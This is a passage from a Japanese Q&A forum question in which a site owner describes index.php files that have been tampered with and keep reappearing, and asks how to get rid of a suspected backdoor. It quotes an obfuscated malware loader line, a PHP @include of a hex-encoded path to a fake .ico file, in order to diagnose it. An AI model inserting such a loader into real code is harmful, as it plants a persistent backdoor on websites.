はじめにwordpressではありません。
第2階層までのindex.phpに下記のような改竄が見られ
各フォルダ内にも下記の記述のあるindex.phpが作られている。
ウィルスに感染したようです。
パーミッションも705,604などに設定しており干渉できない状態ではあるのですが
ネット上には削除と更新で消えるとあるのですが
対象ファイルを更新し、不要ファイルを削除してもすぐに書き込まれており、バックドア型のウィルスのようです。
サイトをごそっと削除して入れ替えたら、消えるものなのでしょうか
よろしくお願いいたします
@include "\057home 中略 062.ico";
追記
ネットで調べたのは
ウェブサイト ウィルス @include
参考にしたサイト
https://its-office.jp/blog/wordpress/2017/09/14/wp-security.html
/*c93de*/ @include "\x2f\x68\x6f\x6d\x65\x2f\x70\x61\x74\x68\x2f\x6e\x61\x6d\x65\x2f\x70\x75\x62\x6c\x69\x63\x5f\x68\x74\x6d\x6c\x2f\x64\x69\x72\x2f\x66\x61\x76\x69\x63\x6f\x6e\x5f\x63\x38\x35\x61\x33\x62\x2e\x69\x63\x6f"; /*c93de*/ echo file_get_contents('index.html.bak.bak'); index.phpを書き換えられたパターンも同じようになっています。 さて、このようになった状態だと駆除が難しいと思いますのでデータだけエクスポートして後はすべて削除して入れ直すというのが一番なのですが、削除も出来ないバックアップもとっていなくて今あるデータのみの場合はデータ丸ごとをPCに保存します。大概のPCはウィルス対策ソフト入れていると思いますのでウィルス入りのデータに反応してウィルスのみ削除してくれます。 コード
回答2件
あなたの回答
tips
プレビュー